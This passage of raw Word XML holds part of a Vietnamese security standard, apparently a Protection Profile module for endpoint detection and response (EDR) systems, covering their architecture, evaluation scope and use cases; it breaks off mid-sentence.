      </w:hyperlink>
      <w:r w:rsidR="00DC449F" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi"/>
        </w:rPr>
        <w:t>có thể là Hệ điều hành vật lý hoặc ảo</w:t>
      </w:r>
      <w:r w:rsidR="00BA2AF5" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> hóa,</w:t>
      </w:r>
      <w:r w:rsidR="00DC449F" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BA2AF5" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>tại</w:t>
      </w:r>
      <w:r w:rsidR="00DC449F" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi"/>
        </w:rPr>
        <w:t xml:space="preserve"> chỗ hoặc</w:t>
      </w:r>
      <w:r w:rsidR="00DC449F" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DC449F" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi"/>
        </w:rPr>
        <w:t>trong sử dụng điện toán đám</w:t>
      </w:r>
      <w:r w:rsidR="00DC449F" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DC449F" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi"/>
        </w:rPr>
        <w:t>mây.</w:t>
      </w:r>
      <w:r w:rsidR="00DC449F" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId34" w:history="1">
        <w:r w:rsidR="00DC449F" w:rsidRPr="00204C5F">
          <w:rPr>
            <w:szCs w:val="28"/>
            <w:lang w:val="vi"/>
          </w:rPr>
          <w:t xml:space="preserve">Các sản phẩm EDR </w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00DC449F" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi"/>
        </w:rPr>
        <w:t xml:space="preserve">dựa vào phần mềm bổ sung chạy trên điểm cuối, được </w:t>
      </w:r>
      <w:r w:rsidR="00DC449F" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>g</w:t>
      </w:r>
      <w:r w:rsidR="00DC449F" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi"/>
        </w:rPr>
        <w:t>ọi là Tác nhân máy chủ, để truyền đạt các</w:t>
      </w:r>
      <w:r w:rsidR="00DC449F" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DC449F" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi"/>
        </w:rPr>
        <w:t xml:space="preserve">lệnh hoặc </w:t>
      </w:r>
      <w:r w:rsidR="00DC449F" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">thay đổi </w:t>
      </w:r>
      <w:r w:rsidR="00DC449F" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi"/>
        </w:rPr>
        <w:t>chính sách và nhận dữ liệu máy chủ điểm</w:t>
      </w:r>
      <w:r w:rsidR="00DC449F" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DC449F" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi"/>
        </w:rPr>
        <w:t xml:space="preserve">cuối. Các yêu cầu </w:t>
      </w:r>
      <w:r w:rsidR="00A35DB0" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi"/>
        </w:rPr>
        <w:t>an toàn</w:t>
      </w:r>
      <w:r w:rsidR="00DC449F" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi"/>
        </w:rPr>
        <w:t xml:space="preserve"> cho Tác nhân máy chủ được giải quyết trong PP-Module [Tác nhân máy chủ] riêng biệt. Đánh giá hệ thống của EDR sẽ yêu cầu đánh giá các thành phần hệ thống khác nhau bao gồm  EDR và  [Tác nhân máy chủ]. Mỗi đánh giá phải đáp ứng các yêu cầu trong cả EDR và HA ngoài </w:t>
      </w:r>
      <w:r w:rsidR="008950B5" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Hồ sơ bảo vệ cho phần mềm ứng dụng</w:t>
      </w:r>
      <w:r w:rsidR="00DC449F" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi"/>
        </w:rPr>
        <w:t xml:space="preserve"> cơ sở. Đánh giá hệ thống EDR cần yêu cầu đánh giá các thành phần hệ thống khác nhau bao gồm  một EDR và ít nhất một Tác nhân máy chủ. Do đó, đánh giá phải yêu cầu sự phù hợp với </w:t>
      </w:r>
      <w:r w:rsidR="003D2FD0" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi"/>
        </w:rPr>
        <w:t xml:space="preserve">cấu hình PP bao gồm </w:t>
      </w:r>
      <w:r w:rsidR="00DC449F" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi"/>
        </w:rPr>
        <w:t>PP-Module để phát hiện và phản hồi điểm cuối (EDR) và PP-Module cho tác nhân máy chủ. Có hai loại kiến trúc chính được giải quyết bởi các yêu cầu trong PP-Module này như hình minh hoạ dưới đây</w:t>
      </w:r>
      <w:r w:rsidR="003D2FD0" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0858CF67" w14:textId="75DBF369" w:rsidR="003D2FD0" w:rsidRPr="00204C5F" w:rsidRDefault="003D2FD0" w:rsidP="00BD2F41">
      <w:pPr>
        <w:spacing w:before="0" w:after="120"/>
        <w:ind w:right="-19"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">• Các điểm cuối kết nối thông qua Internet với EDR được tổ chức bởi </w:t>
      </w:r>
      <w:r w:rsidR="00715386">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>đơn vị cung cấp</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> dịch vụ đám mây (Phần mềm dưới dạng Dịch vụ).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44FB8400" w14:textId="2AFB3F4C" w:rsidR="003D2FD0" w:rsidRPr="00204C5F" w:rsidRDefault="003D2FD0" w:rsidP="00BD2F41">
      <w:pPr>
        <w:spacing w:before="0" w:after="120"/>
        <w:ind w:right="-19"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>• Các điểm cuối giao tiếp với EDR tại chỗ trong mô hình mạng trung tâm.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DBD6841" w14:textId="7B680AB0" w:rsidR="00DC449F" w:rsidRPr="00204C5F" w:rsidRDefault="00BA2AF5" w:rsidP="00BD2F41">
      <w:pPr>
        <w:spacing w:before="0" w:after="120"/>
        <w:ind w:right="-19"/>
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251664384" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="175ADC36" wp14:editId="7BDF8DB9">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>492125</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>236220</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5742940" cy="2048510"/>
            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="32" name="Hình ảnh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42940" cy="2048510"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7703617E" w14:textId="240D3F84" w:rsidR="00DC449F" w:rsidRPr="00204C5F" w:rsidRDefault="00DC449F" w:rsidP="00BD2F41">
      <w:pPr>
        <w:spacing w:before="360" w:after="480"/>
        <w:ind w:right="-19"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi"/>
        </w:rPr>
        <w:t>Hình 1</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi"/>
        </w:rPr>
        <w:t xml:space="preserve">Kiến </w:t>
      </w:r>
      <w:hyperlink r:id="rId36" w:history="1">
        <w:r w:rsidRPr="00204C5F">
          <w:rPr>
            <w:szCs w:val="28"/>
            <w:lang w:val="vi"/>
          </w:rPr>
          <w:t xml:space="preserve">trúc EDR </w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi"/>
        </w:rPr>
        <w:t xml:space="preserve"> chính</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D671E72" w14:textId="5B5E142D" w:rsidR="00851C6A" w:rsidRPr="00204C5F" w:rsidRDefault="00DC449F" w:rsidP="00BD2F41">
      <w:pPr>
        <w:spacing w:before="240"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>5.</w:t>
      </w:r>
      <w:r w:rsidR="005157CB" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.1</w:t>
      </w:r>
      <w:r w:rsidR="00851C6A" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Phạm vi TOE</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:p w14:paraId="03960C97" w14:textId="269C217E" w:rsidR="00285288" w:rsidRPr="00204C5F" w:rsidRDefault="003D2FD0" w:rsidP="00BD2F41">
      <w:pPr>
        <w:spacing w:before="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251662336" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="16556E4A" wp14:editId="6FD9641F">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>22860</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>1807210</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6448425" cy="1285875"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="92" name="Picture 9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Text&#10;&#10;Description automatically generated with low confidenc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48425" cy="1285875"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00285288" w:rsidRPr="00204C5F">
        <w:t>Phạm vi</w:t>
      </w:r>
      <w:r w:rsidR="00BA2AF5" w:rsidRPr="00204C5F">
        <w:t xml:space="preserve"> TOE cho</w:t>
      </w:r>
      <w:r w:rsidR="00285288" w:rsidRPr="00204C5F">
        <w:t xml:space="preserve"> EDR bao gồm tất cả các phần mềm từ </w:t>
      </w:r>
      <w:r w:rsidR="00715386">
        <w:t>đơn vị cung cấp</w:t>
      </w:r>
      <w:r w:rsidR="00285288" w:rsidRPr="00204C5F">
        <w:t xml:space="preserve"> TOE đại diện cho phía quản lý máy chủ hoặc doanh nghiệp quản lý hệ thống EDR. </w:t>
      </w:r>
      <w:r w:rsidR="00BA2AF5" w:rsidRPr="00204C5F">
        <w:t>Trong đa số trường hợp</w:t>
      </w:r>
      <w:r w:rsidR="00285288" w:rsidRPr="00204C5F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BA2AF5" w:rsidRPr="00204C5F">
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="00285288" w:rsidRPr="00204C5F">
        <w:t xml:space="preserve">nhưng không phải </w:t>
      </w:r>
      <w:r w:rsidR="00BA2AF5" w:rsidRPr="00204C5F">
        <w:t xml:space="preserve">tất cả các trường hợp) </w:t>
      </w:r>
      <w:r w:rsidR="00285288" w:rsidRPr="00204C5F">
        <w:t>là phần mềm chạy đằng sau ứng dụng web hoặc giao diện quản trị, và có thể với các dịch vụ phần mềm khác đang chạy để gửi và nhận dữ liệu với Tác nhân máy chủ. EDR cũng có thể sử dụng cơ sở dữ liệu để lưu trữ dữ liệu được thu thập và phân tích. Bản thân bất kỳ phần mềm cơ sở dữ liệu nào nằm ngoài phạm vi của TOE, cũng như bất kỳ phần mềm máy chủ web nào được sử dụng để phục vụ ứng dụng web hoặc giao diện quản trị và hệ điều hành hoặc nền tảng đám mây cơ bản. Hình vẽ mô tả dưới đây cho thấy EDR (phải) giao tiếp với Tác nhân máy chủ (trái) qua một mạng không đáng tin cậy.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20679846" w14:textId="541F05E4" w:rsidR="00851C6A" w:rsidRPr="00204C5F" w:rsidRDefault="00285288" w:rsidP="00BD2F41">
      <w:pPr>
        <w:pStyle w:val="Hinhve"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:t xml:space="preserve">Hình </w:t>
      </w:r>
      <w:r w:rsidR="00DC449F" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Các giao tiếp giữa EDR và </w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:t>Máy chủ trung gian</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0701E62C" w14:textId="74EAA4A6" w:rsidR="00DC449F" w:rsidRPr="00204C5F" w:rsidRDefault="00DC449F" w:rsidP="00BD2F41">
      <w:pPr>
        <w:pStyle w:val="Hinhve"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="005157CB" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:t>.2 Nền tảng TOE (</w:t>
      </w:r>
      <w:r w:rsidR="00E21DCE" w:rsidRPr="00204C5F">
        <w:t>Đối tượng đánh giá</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:t xml:space="preserve"> - Target of Evaluation)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06106F84" w14:textId="4C8520CF" w:rsidR="00DC449F" w:rsidRPr="00204C5F" w:rsidRDefault="00DC449F" w:rsidP="00BD2F41">
      <w:r w:rsidRPr="00204C5F">
        <w:t>Nền tảng TOE bao gồm nền tảng hệ điều hành hoặc sử dụng nền tảng điện toàn đám mây mà phần mềm EDR thực thi, nằm ngoài phạm vi đánh giá. Tuy nh</w:t>
      </w:r>
      <w:r w:rsidR="002B16C4" w:rsidRPr="00204C5F">
        <w:t xml:space="preserve">iên, tính bảo mật của EDR </w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:t xml:space="preserve">phụ thuộc vào </w:t>
      </w:r>
      <w:r w:rsidR="002B16C4" w:rsidRPr="00204C5F">
        <w:t>chính bản thân sản phẩm</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="580182A6" w14:textId="751EA877" w:rsidR="00DC449F" w:rsidRPr="00204C5F" w:rsidRDefault="00DC449F" w:rsidP="00BD2F41">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Bất kỳ </w:t>
      </w:r>
      <w:r w:rsidR="002B16C4" w:rsidRPr="00204C5F">
        <w:t>thông tin</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002B16C4" w:rsidRPr="00204C5F">
        <w:t xml:space="preserve">kết nối </w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:t xml:space="preserve">nào có liên quan các tệp từ xa đáng tin cậy hoặc dịch vụ thông tin về mối đe dọa đều có liên quan đến </w:t>
      </w:r>
      <w:r w:rsidR="00A35DB0" w:rsidRPr="00204C5F">
        <w:t>an toàn</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:t xml:space="preserve"> hệ thống EDR tổng thể nhưng có thể nằm ngoài phạm vi đánh giá.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73AFCDB7" w14:textId="3CF51FD2" w:rsidR="00DC449F" w:rsidRPr="00204C5F" w:rsidRDefault="00DC449F" w:rsidP="00BD2F41">
      <w:pPr>
        <w:pStyle w:val="Hinhve"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="005157CB" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:t xml:space="preserve"> Trường hợp áp dụng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22122854" w14:textId="25A959E6" w:rsidR="00DC449F" w:rsidRPr="00204C5F" w:rsidRDefault="00DC449F" w:rsidP="00BD2F41">
      <w:pPr>
        <w:ind w:right="60"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Arial"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi"/>
        </w:rPr>
        <w:t xml:space="preserve">ác yêu cầu trong </w:t>
      </w:r>
      <w:r w:rsidR="002B16C4" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>tiêu chuẩn</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi"/>
        </w:rPr>
        <w:t xml:space="preserve"> này được thiết kế để giải quyết vấn đề </w:t>
      </w:r>
      <w:r w:rsidR="00A35DB0" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi"/>
        </w:rPr>
        <w:t>an toàn</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi"/>
        </w:rPr>
        <w:t xml:space="preserve"> cho các trường hợp sử dụng được nêu dưới đây. Chức  năng của EDR có thể được mở rộng bởi các tiện ích bổ sung, nguồn cung cấp dữ liệu về thông tin mối đe dọa hoặc các chức năng được công bố khác. Được coi là nằm ngoài phạm vi của </w:t>
      </w:r>
      <w:r w:rsidR="002B16C4" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>tiêu chuẩn</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi"/>
        </w:rPr>
        <w:t xml:space="preserve"> này.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DA1EE3E" w14:textId="1B825032" w:rsidR="00DC449F" w:rsidRPr="00204C5F" w:rsidRDefault="00DC449F" w:rsidP="00BD2F41">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Arial"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>TRƯỜNG HỢP SỬ DỤNG</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1] Phát hiện </w:t>
      </w:r>
      <w:r w:rsidR="005873FB" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi"/>
        </w:rPr>
        <w:t>hoạt động có khả năng trái phép</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="383D7E31" w14:textId="09F864EC" w:rsidR="00DC449F" w:rsidRPr="00204C5F" w:rsidRDefault="00DC449F" w:rsidP="00BD2F41">
      <w:pPr>
        <w:ind w:right="80"/>
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi"/>
        </w:rPr>
        <w:t xml:space="preserve">Việc phát hiện hoạt động, phần mềm hoặc người dùng có khả năng hoạt động trái phép được </w:t>
      </w:r>
      <w:r w:rsidR="00BA2AF5" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>phát hiện</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi"/>
        </w:rPr>
        <w:t xml:space="preserve"> bằng cách thu thập dữ liệu </w:t>
      </w:r>
      <w:r w:rsidR="00BA2AF5" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">từ </w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi"/>
        </w:rPr>
        <w:t xml:space="preserve">điểm cuối đến </w:t>
      </w:r>
      <w:r w:rsidR="00BA2AF5" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">máy chủ </w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi"/>
        </w:rPr>
        <w:t>EDR trung tâm, nơi dữ liệu được phân tích.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A1EE416" w14:textId="77777777" w:rsidR="00DC449F" w:rsidRPr="00204C5F" w:rsidRDefault="00DC449F" w:rsidP="00BD2F41">
      <w:pPr>
        <w:ind w:right="80"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Arial"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi"/>
        </w:rPr>
        <w:t>[TRƯỜNG HỢP SỬ DỤNG 2] Khắc phục hoạt động độc hại</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E20E200" w14:textId="77777777" w:rsidR="00DC449F" w:rsidRPr="00204C5F" w:rsidRDefault="00DC449F" w:rsidP="00BD2F41">
      <w:pPr>
        <w:ind w:right="40"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Arial"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi"/>
        </w:rPr>
        <w:t>Khả năng bắt đầu các lệnh khắc phục để tập trung xử lý hoạt động độc hại được phát hiện là một trường hợp sử dụng chính của EDR.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E8B1B2D" w14:textId="77777777" w:rsidR="00DC449F" w:rsidRPr="00204C5F" w:rsidRDefault="00DC449F" w:rsidP="00BD2F41">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Arial"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi"/>
        </w:rPr>
        <w:t xml:space="preserve">[TRƯỜNG HỢP SỬ DỤNG 3] </w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Mở rộng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0514A6C3" w14:textId="0A9B0B8A" w:rsidR="00DC449F" w:rsidRPr="00204C5F" w:rsidRDefault="00DC449F" w:rsidP="00BD2F41">
      <w:pPr>
        <w:pStyle w:val="Hinhve"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi"/>
        </w:rPr>
        <w:t xml:space="preserve">Khả năng duyệt, truy vấn và xuất dữ liệu điểm cuối dựa trên máy chủ tổng hợp một cách hiệu quả cho phép </w:t>
      </w:r>
